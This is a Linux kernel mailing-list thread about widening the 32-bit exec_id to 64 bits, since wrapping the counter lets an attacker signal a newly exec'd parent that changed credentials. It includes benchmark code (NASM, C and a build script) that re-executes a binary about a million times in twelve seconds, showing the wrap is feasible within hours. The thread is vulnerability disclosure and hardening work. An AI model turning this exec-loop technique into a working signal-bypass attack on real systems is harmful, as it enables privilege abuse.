On Thu, Apr 02, 2020 at 06:46:49AM +0200, Jann Horn wrote:
On Wed, Apr 1, 2020 at 10:50 PM Eric W. Biederman <ebiederm@xmission.com> wrote:
Replace the 32bit exec_id with a 64bit exec_id to make it impossible to wrap the exec_id counter. With care an attacker can cause exec_id wrap and send arbitrary signals to a newly exec'd parent. This bypasses the signal sending checks if the parent changes their credentials during exec.
The severity of this problem can be seen in that, in my limited testing of a 32bit exec_id, it can take as little as 19s to exec 65536 times, which means that it can take as little as 14 days to wrap a 32bit exec_id. Adam Zabrocki has succeeded in wrapping the self_exec_id in 7 days. Even my slower timing is within the uptime of a typical server.
FYI, if you actually optimize this, it's more like 12s to exec 1048576 times according to my test, which means ~14 hours for 2^32 executions (on a single core). That's on an i7-4790 (a Haswell desktop processor that was launched about six years ago, in 2014).
Yep, there are a few ways of optimizing it and I believe I've pointed it out here: https://www.openwall.com/lists/kernel-hardening/2020/03/31/11
Thanks for doing such tests :)
I've also modified your PoC to use the 'sysenter' and 'syscall' instructions. Both cases gave me an extra 4% speed bump (including a test for a 64-bit "fast_execve"). I ran it on an Intel(R) Xeon(R) E-2176G CPU @ 3.70GHz.
As you've proven, it can be done in a matter of hours.
Thanks, Adam
Here's my test code:
=============
$ grep 'model name' /proc/cpuinfo | head -n1
model name : Intel(R) Core(TM) i7-4790 CPU @ 3.60GHz
$ cat build.sh
#!/bin/sh
# Build the 32-bit re-exec loop (no libc), then the launcher and the
# helper that ends the run.
set -e
nasm -felf32 -o fast_execve.o fast_execve.asm
ld -m elf_i386 -o fast_execve fast_execve.o
gcc -o launch launch.c -Wall
gcc -o finish finish.c -Wall
$ cat fast_execve.asm
;-----------------------------------------------------------------------
; fast_execve.asm -- re-execute this binary in a tight loop.
;
; Syntax: NASM (Intel operand order).
; Target: 32-bit Linux, raw int 0x80 syscalls, entered at _start (no libc).
;
; Contract with the launcher (launch.c):
;   fd 3    = O_PATH descriptor for this binary (re-exec target)
;   fd 4    = O_PATH descriptor for the "finish" helper
;   argv[0] = counter made of 8 base-16 digits, 'a' meaning 0x0 and 'p'
;             meaning 0xf, least-significant digit first; it is updated
;             in place and handed on to the next exec
;
; Every run adds one to the counter and re-executes fd 3. Once the carry
; runs past the lowest COUNTER_DIGITS digits, i.e. after
; pow(16, COUNTER_DIGITS) execs, the stack limit is raised again and fd 4
; is executed instead.
;-----------------------------------------------------------------------
bits 32

SYS_SETRLIMIT   equ 75                  ; setrlimit (32-bit ABI)
SYS_EXECVEAT    equ 358                 ; execveat (32-bit ABI)
RLIMIT_STACK    equ 3
AT_EMPTY_PATH   equ 0x1000
FD_SELF         equ 3                   ; opened by launch.c
FD_FINISH       equ 4                   ; opened by launch.c
DIGIT_ZERO      equ 'a'                 ; character that encodes digit 0x0
DIGIT_BASE      equ 16
COUNTER_DIGITS  equ 5                   ; this is N, where iteration_count=pow(16,N)

section .text
global _start
_start:
        ; eax = argv[0]
        ; expected to be 8 hex digits, with 'a' meaning 0x0 and 'p' meaning 0xf
        mov     eax, [esp+4]

        xor     ebx, ebx                ; ebx = digit index (loop counter)
hex_digit_loop:
        inc     byte [eax+ebx]
        cmp     byte [eax+ebx], DIGIT_ZERO+DIGIT_BASE
        jne     next_exec               ; digit did not overflow: no carry
        mov     byte [eax+ebx], DIGIT_ZERO ; wrap digit, carry into the next one
        inc     ebx
        cmp     ebx, COUNTER_DIGITS
        jne     hex_digit_loop

        ; reached pow(16,N) execs, get out

        ; first make the stack big again
        ; (the result is not checked; on failure the helper is still executed)
        mov     eax, SYS_SETRLIMIT
        mov     ebx, RLIMIT_STACK
        mov     ecx, stacklim
        int     0x80

        ; execute end helper
        mov     ebx, FD_FINISH          ; dirfd = 4
        jmp     common_exec

next_exec:
        mov     ebx, FD_SELF            ; dirfd = 3

common_exec:
        ; execveat() with file descriptor passed in as ebx
        mov     ecx, nullval            ; pathname = empty string
        lea     edx, [esp+4]            ; argv
        xor     esi, esi                ; envp = NULL
        mov     edi, AT_EMPTY_PATH      ; flags = AT_EMPTY_PATH
        mov     eax, SYS_EXECVEAT
        int     0x80
        int3                            ; only reached if execveat returned

; Read-only data, deliberately left in .text as in the original layout.
nullval:
        dd      0                       ; "" (just a NUL terminator)
stacklim:                               ; struct rlimit for setrlimit above
        dd      0x02000000              ; rlim_cur
        dd      0xffffffff              ; rlim_max
$ cat launch.c
#define _GNU_SOURCE
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <sys/syscall.h>
#include <sys/resource.h>

/*
 * Set up the environment fast_execve expects and start the first exec:
 * fd 3 refers to fast_execve, fd 4 to finish, argv[0] is the all-zero
 * counter "aaaaaaaa", and the soft stack limit is lowered to 0x4000 bytes
 * (fast_execve raises it again before running finish).
 */
int main(void) {
  /* fast_execve.asm hard-codes fds 3 and 4, so free them first. */
  close(3);
  close(4);
  if (open("fast_execve", O_PATH) != 3)
    err(1, "open fast_execve");
  if (open("finish", O_PATH) != 4)
    err(1, "open finish");
  char *argv[] = { "aaaaaaaa", NULL };

  struct rlimit lim;
  if (getrlimit(RLIMIT_STACK, &lim))
    err(1, "getrlimit");
  lim.rlim_cur = 0x4000;
  if (setrlimit(RLIMIT_STACK, &lim))
    err(1, "setrlimit");

  syscall(__NR_execveat, 3, "", argv, NULL, AT_EMPTY_PATH);
  /* execveat only returns on failure; do not exit 0 as if the run succeeded. */
  err(1, "execveat");
}
$ cat finish.c
#include <stdlib.h>

/* End of the exec chain: exit successfully so `time ./launch` completes. */
int main(void) {
  exit(0);
}
$ ./build.sh
$ time ./launch

real 0m12,075s
user 0m0,905s
sys 0m11,026s
$
=============